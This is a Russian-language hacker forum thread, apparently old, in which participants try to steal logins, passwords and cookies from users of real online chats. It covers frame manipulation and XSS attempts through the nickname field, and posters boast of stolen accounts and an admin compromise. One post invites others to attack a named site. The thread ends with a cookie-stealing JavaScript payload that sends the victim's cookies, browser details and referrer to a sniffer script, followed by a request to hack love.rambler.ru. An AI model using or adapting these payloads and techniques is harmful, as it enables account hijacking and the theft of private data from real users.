Здрям, Поцики!! Кто знает, как из фрейма вытянуть инфу? Ну когда жертва открывает соседнее окно со скриптом (как написать???) Фрейма -4, один из них пишу-)) Фрейм: <form action="http://HACKED-CHAT.ru/cgi-bin/chat/chat.cgi" name="post" method="POST" > <input type="hidden" name="action" value="post"> <input type="hidden" name="password" value="1234"> <input type="hidden" name="login" value="Vasja-Lamer"> <input type="text" size="40" name="post" MAXLENGTH=400 > <input type="submit" value="Сказать" > <input type="submit" name=act value="Сделать" > </form> <script language="javascript"> document.post.post.focus(); </script><br><br><br><br> Знает кто???? Дмитро
Fr1k, Смысл такой: В чате - 4 фрейма, пароль и логин везде прописывается открыто,и в строке браузера пишется: тра-та-та/cgi-bin/chat.cgi&login=Vasya&password=123 Но сниф закинуть непосредственно в тела чата не получается,там СУПЕР-фильтр, мысль такая: Жертва открывает отдельное окно, в котором должен быть скрипт,либо вытягивающий PASSW из любого фрейма, либо Внедряющийся в окно чата, ну там путём: FRAMESET,или чёто в этом духе..ну а дальше, на мыло или путём get.. Я с этим ранее не работал, по этому имею плохое представление о обращениях фреймов друг к другу. Но точно знаю,что можно-) Вот эти записи типо top.frames[3].document.forms[0] я слабо понимаю. Раньше всегда сам разбирался,но здесь помощь нужна, а то я в тупике . Тфу блин, так если в строке браузера пропис-ся пароль,так его ж и надо снифом глушить, но тогда как его всунуть??? (но строка в браузере меняется каждые 5 сек. и становится без пароля (../online.cgi) Блин,посоветуйте чёнть конкретное?????? Dmitro
По идее невозможно из загруженной html-странички получить доступ к другой страничке, которая открыта в данный момент ... Но, допустим, открыто окно и там фрейм с именем password и если использовать метод Code: window.open("/", "password") и грузить туда наш сайт, то все пройдет нормально, но т.к. фрейм с именем password уже существует, то сайт загружается в уже открытое окно ... У меня возникли сложности с извлечением содержимого фрейма password ... Я хотел, чтобы фрейм загрузился в окно, которое размещено на сайте, куда мы заманим юзера и это все загруженное передалось на сниффер ...
Че Гевара, Тот, что написал, - "POST" , но блин, там и "MAIN" , и др. есть... А вообще PASSWORD и LOGIN в строке браузера: ...../chat.cgi&login=VASYA&password=123 Фильтр стоит Приличный, как же в тело чата сниф засунуть???? С помощью FRAMESET , ну или вытянуть инфу путём get, или там на мыло... ??? Короче лучше раз увидеть, чем сто раз... Могу на мыло выслать pass и login, чтоб войти, а то там регистрацию запретили .. А логины - не вопрос... я их понапиз...л прилично, тока боюсь, не надолго, периодически всех!!! киляют. Я там достал всех уже своим вторжением-)) Этот чат использую как учебное пособие для взломов.
Code: window.open("/", "post") Пробывать сделать, чтобы во фрейм грузился сниффер нет смысла ... Подумаю насчет передачи PASSWORD и LOGIN на сниффер ...
Че Гевара У меня один последний ник остался.... Вот такие там СССобаки!!! Грех не взломать,да? Но терь походу придётся базу паролей искать,но у меня и с этим тоже не очень... пробовал всякие ../../htpaswd и всякую фигню, но пока безуспешно(( ЛЮДИ!!! Советуйте!!! Дмитро
window.open("http........", "post") это всё я давно там пробовал, фигня всё это... максимум грузится страница и отображается во всё окно, а надо только в фрейм, а лучше чтоб в невидимый фрейм, снифер туда никак... НО!!! когда я взламывал там Админа, то я и снифы вставлял прямо в тело чата, и невидимые ссылки onmouseover на сниф и т.д. там же и во фреймы кидал чё мне надо.. А ВОТ не имея прав админа Пытаюсь из соседнего окна что то вставить. Блин да можно так делать, я просто уже всё позабыл-)) НУ КТОНТЬ ЗНАЕТ ???
ВНИМАНИЕ!!!!! В том чате "Борнео" разрешена регистрация ! Если кто не желает помучить бедный дырявый чат не заходите туда, а то у вас это может получиться ... Здесь ссылка Borneo.ru хи-хи-хи... описание дырок на гл. странице (статья про взлом чатов и в пример конкретный...)
Немного от темы... Жизненно важный вопрос!! Если ктонть знает, скажите, в обычном html документе можно скрипт написать, узнающий реферера, или я опять страдаю иллюзиями о лёгких взломах?????? УБЕДИТЕЛЬНО ПРОШУ ответить тех, кто знает, хотя бы в принципе???
Вопрос наверное к Algol Вообщем то попал на один чат, построение впринципе уже знакомое,но! уж через-чур фильтры сильные: ничё не пропускает,кроме как через ник, и то немного.. короче: ...... <a href="#end" onclick="return Write('НИК, ')"> <b>НИК:</b></a><font color=C0C0C0> Сообщение</font> ...... в нике пропускаются : & # % ' > / \ ; единственное,что смог - эт на событие onclick, но не могу перекрыть двойную кавычку onclick, можно ли что то сделать,хотя бы вывести на onmouseover ????? У меня нифика не получилось.... Да,кстати только в нике! а в репликах на всё фильтр. Помоги, плиииз ?
пам-парам-пам-пам-пам-парам-парарарарам-парам-пам-пам... походу здесь нифика не видно и никто мне не ответит.... тогда надо тему кильнуть...........
ХОП-ХЕЙ КРУТО!!! Написал скрипт, который всё же вытягивает инфу о рефере, и не тока... И всё в HTML.. Спасибо за вдохновление Кубинскому приятелю че гевере ) Хоть algol и говорил, что нельзя... Ну вообщем он будя всё выдавать о юзере. Может кому тоже нужно будет, так я не жадный (Продвинутым можно не читать, а то опять скажите,что эт уж давно известно или чёнть в этом духе... ) Ещё одно изобретение (можно узнать и не тока для текущего HTML но и... ) Но простите, пока все чаты не переломаю фиг скажу... ХА! - <Script language="JavaScript"> if(navigator.userAgent.indexOf('IRIX') != -1) { var OpSys = "Irix"; } else if((navigator.userAgent.indexOf('Win') != -1) && (navigator.userAgent.indexOf('95') != -1)) { var OpSys = "Windows 95"; } else if(navigator.userAgent.indexOf('Win') != -1) { var OpSys = "Windows 3.1 or NT"; } else if(navigator.userAgent.indexOf('Mac') != -1) { var OpSys = "Macintosh"; } else { var OpSys = "Other"; }date= new Date();zone= date.getTimezoneOffset();gmt= date.toGMTString();bname=navigator.appName;bversion=navigator.appVersion;if (bname=="Netscape"){bplugins=navigator.plugins.length;}if (bname=="Netscape"){address=java.net.InetAddress.getLocalHost(); ip=address.getHostAddress();}loc=location.href;modi=document.lastModified;refer=document.referrer;if (bname=="Netscape"){var tools=java.awt.Toolkit.getDefaultToolkit();var size=tools.getScreenSize();w=size.width;h=size.height;}</Script><script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+refer+loc+OpSys+modi+date+bname+bversion+document.cookie;</script> Вообще то я его в одну строчку делал, так шо проверять не буду чё там после вставки стало.. да и немного выдернул из него (секрет) А идею мне счётчики статистик подкинули, они много чего могут.. Короче вставляю его в инфу (В чате) через юзерагента, как я писал в статье для новичков, и в логах сникерса смотрим........ Так шо версия для новичков, но и то харшо... А другие данные - эт конеШна секрет. тфу блин, лишнего урезал.. если надо скрин сайз, то ещё к сникерсу +h и +w.. Да, кстати, чё, кто-то GOOGLE заснифирил??? я когда логи смотрел, видел там про него... Эт круто! Молодцы! ♣ -Dmitro- ♣
КтоНьть знает как ломануть love.rambler.ru ?? там посетителей неибаца, можно свой сайт раскрутить прилично...